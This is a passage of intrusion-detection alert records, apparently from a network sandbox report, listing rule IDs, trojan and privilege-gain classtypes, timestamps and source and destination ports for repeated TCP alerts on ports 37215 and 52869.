                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.666100
                      SID:2829579
                      Source Port:56836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.569791
                      SID:2027339
                      Source Port:40128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.592319
                      SID:2025132
                      Source Port:49786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.822392
                      SID:2835222
                      Source Port:55546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322110
                      SID:2831300
                      Source Port:50904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.895587
                      SID:2025132
                      Source Port:33518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.633481
                      SID:2835222
                      Source Port:58682
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.565131
                      SID:2027339
                      Source Port:41940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.471349
                      SID:2027339
                      Source Port:33208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2829579
                      Source Port:46192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.919195
                      SID:2025132
                      Source Port:58878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.222279
                      SID:2835222
                      Source Port:58602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.118166
                      SID:2835222
                      Source Port:45782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631549
                      SID:2835222
                      Source Port:35868
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.855022
                      SID:2027339
                      Source Port:35600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:03.882859
                      SID:2027339
                      Source Port:59642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2835222
                      Source Port:47446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2829579
                      Source Port:47098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.835178
                      SID:2027339
                      Source Port:59778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2829579
                      Source Port:55948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876437
                      SID:2829579
                      Source Port:53292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.105161
                      SID:2027339
                      Source Port:43056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.910426
                      SID:2829579
                      Source Port:45686
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222129
                      SID:2835222
                      Source Port:40802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.015200
                      SID:2027339
                      Source Port:46412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.030401
                      SID:2027339
                      Source Port:33440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.478924
                      SID:2027339
                      Source Port:56258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.944836
                      SID:2025132
                      Source Port:55484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.664090
                      SID:2027339
                      Source Port:52998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:27.381027
                      SID:2831300
                      Source Port:54888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2829579
                      Source Port:37572
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.117979
                      SID:2027339
                      Source Port:37426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2835222
                      Source Port:47310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.295717
                      SID:2027339
                      Source Port:41290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631549
                      SID:2829579
                      Source Port:40492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.035425
                      SID:2027339
                      Source Port:59144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.005156
                      SID:2835222
                      Source Port:44902
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.014689
                      SID:2835222
                      Source Port:44888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.130270
                      SID:2027339
                      Source Port:54738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.787139
                      SID:2025132
                      Source Port:49954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.290518
                      SID:2027339
                      Source Port:41866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816101
                      SID:2835222
                      Source Port:57656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.286911
                      SID:2025132
                      Source Port:52456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.945909
                      SID:2025132
                      Source Port:40546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.439367
                      SID:2027339
                      Source Port:44908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.666100
                      SID:2835222
                      Source Port:56188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.875785
                      SID:2025132
                      Source Port:54080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2829579
                      Source Port:37886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.390301
                      SID:2027339
                      Source Port:51042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.719313
                      SID:2025132
                      Source Port:39752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2829579
                      Source Port:33762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.058270
                      SID:2831300
                      Source Port:54394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.592736
                      SID:2025132
                      Source Port:46258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.190255
                      SID:2831300
                      Source Port:53358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:08.008782
                      SID:2025132
                      Source Port:37426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2835222
                      Source Port:53458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.223705
                      SID:2027339
                      Source Port:35596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.019773
                      SID:2025132
                      Source Port:42918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.674122
                      SID:2831300
                      Source Port:47054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.808098
                      SID:2027339
                      Source Port:44152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.634900
                      SID:2027339
                      Source Port:45770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.169339
                      SID:2829579
                      Source Port:59268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.068033
                      SID:2027339
                      Source Port:37484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.979245
                      SID:2027339
                      Source Port:34166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.871315
                      SID:2831300
                      Source Port:47642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.171604
                      SID:2831300
                      Source Port:37098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:48.156942
                      SID:2027339
                      Source Port:46730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.205395
                      SID:2027339
                      Source Port:57088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.637063
                      SID:2027339
                      Source Port:54854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2829579
                      Source Port:53678
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.924014
                      SID:2831300
                      Source Port:49876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.494330
                      SID:2027339
                      Source Port:48532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.337240
                      SID:2027339
                      Source Port:57208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.275988
                      SID:2025132
                      Source Port:54988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:03:04.216653
                      SID:2025132
                      Source Port:49818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.222229
                      SID:2829579
                      Source Port:54738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.464786
                      SID:2025132
                      Source Port:52634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.207149
                      SID:2027339
                      Source Port:38228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.774505
                      SID:2027339
                      Source Port:41374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.756264
                      SID:2027339
                      Source Port:52646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.686800
                      SID:2831300
                      Source Port:46680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.060344
                      SID:2829579
                      Source Port:52456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2835222
                      Source Port:32978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2829579
                      Source Port:46358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.299284
                      SID:2025132
                      Source Port:54778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.870904
                      SID:2027339
                      Source Port:39194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.623247
                      SID:2027339
                      Source Port:54538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807101
                      SID:2027339
                      Source Port:53936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.056014
                      SID:2025132
                      Source Port:56622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.387777
                      SID:2831300
                      Source Port:44176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:03.112911
                      SID:2025132
                      Source Port:43688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.117066
                      SID:2835222
                      Source Port:59010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.571884
                      SID:2025132
                      Source Port:47800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.698984
                      SID:2025132
                      Source Port:59242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.586276
                      SID:2027339
                      Source Port:32882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.112515
                      SID:2025132
                      Source Port:37944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.720788
                      SID:2831300
                      Source Port:56934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.903210
                      SID:2831300
                      Source Port:49220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.079114
                      SID:2829579
                      Source Port:43806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.843278
                      SID:2027339
                      Source Port:57508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.328384
                      SID:2025132
                      Source Port:51596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.220064
                      SID:2025132
                      Source Port:47212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.982478
                      SID:2829579
                      Source Port:43552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.674845
                      SID:2025132
                      Source Port:37122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.489542
                      SID:2027339
                      Source Port:44408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.922614
                      SID:2027339
                      Source Port:44866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.143690
                      SID:2831300
                      Source Port:35542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2829579
                      Source Port:33174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.118192
                      SID:2025132
                      Source Port:40918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.047414
                      SID:2027339
                      Source Port:43172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2829579
                      Source Port:51316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2835222
                      Source Port:41876
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.929550
                      SID:2027339
                      Source Port:55272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2835222
                      Source Port:58050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.332163
                      SID:2027339
                      Source Port:40454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.258634
                      SID:2025132
                      Source Port:37000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.006983
                      SID:2025132
                      Source Port:45886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.610865
                      SID:2027339
                      Source Port:35466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.714534
                      SID:2025132
                      Source Port:44018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.161851
                      SID:2027339
                      Source Port:38102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.054566
                      SID:2027339
                      Source Port:50458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.452336
                      SID:2027339
                      Source Port:40572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.882590
                      SID:2027339
                      Source Port:50582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.064325
                      SID:2025132
                      Source Port:59782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.440718
                      SID:2831300
                      Source Port:49428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2835222
                      Source Port:53918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2835222
                      Source Port:39424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.182584
                      SID:2027339
                      Source Port:41186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.034156
                      SID:2027339
                      Source Port:45608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.710832
                      SID:2831300
                      Source Port:35548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.602822
                      SID:2831300
                      Source Port:57726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.918137
                      SID:2027339
                      Source Port:35604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.834044
                      SID:2027339
                      Source Port:57978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.332650
                      SID:2829579
                      Source Port:37688
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633742
                      SID:2829579
                      Source Port:49618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.060998
                      SID:2835222
                      Source Port:38858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.084243
                      SID:2027339
                      Source Port:49044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.642910
                      SID:2027339
                      Source Port:56940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.647416
                      SID:2025132
                      Source Port:48246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.621030
                      SID:2831300
                      Source Port:56310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.631749
                      SID:2027339
                      Source Port:52014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.358696
                      SID:2025132
                      Source Port:43296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.455702
                      SID:2831300
                      Source Port:45688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2829579
                      Source Port:42554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.646505
                      SID:2027339
                      Source Port:51246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.835427
                      SID:2831300
                      Source Port:51488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.919383
                      SID:2027339
                      Source Port:55932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807585
                      SID:2831300
                      Source Port:37972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:32.034562
                      SID:2835222
                      Source Port:34840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.309528
                      SID:2025132
                      Source Port:60726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.100332
                      SID:2829579
                      Source Port:37614
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:05.000501
                      SID:2027339
                      Source Port:39416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.050420
                      SID:2027339
                      Source Port:60922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.267254
                      SID:2027339
                      Source Port:57088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.301143
                      SID:2829579
                      Source Port:37048
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.039719
                      SID:2829579
                      Source Port:56254
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469869
                      SID:2027339
                      Source Port:52872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.566623
                      SID:2027339
                      Source Port:59894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.270954
                      SID:2025132
                      Source Port:41386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.692028
                      SID:2027339
                      Source Port:45838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.263141
                      SID:2025132
                      Source Port:60330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.316196
                      SID:2027339
                      Source Port:36560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2835222
                      Source Port:39244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.822700
                      SID:2025132
                      Source Port:49678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.974569
                      SID:2829579
                      Source Port:59904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.328263
                      SID:2027339
                      Source Port:35892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.383466
                      SID:2025132
                      Source Port:48316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.930155
                      SID:2831300
                      Source Port:57282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.593868
                      SID:2027339
                      Source Port:46206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650871
                      SID:2835222
                      Source Port:56940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.924852
                      SID:2831300
                      Source Port:58936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2829579
                      Source Port:51388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.109136
                      SID:2027339
                      Source Port:40670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2835222
                      Source Port:42692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.207719
                      SID:2027339
                      Source Port:59236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.727671
                      SID:2027339
                      Source Port:59060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.022763
                      SID:2829579
                      Source Port:50798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2829579
                      Source Port:60160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:53.715694
                      SID:2025132
                      Source Port:50214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.972472
                      SID:2027339
                      Source Port:60870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.719998
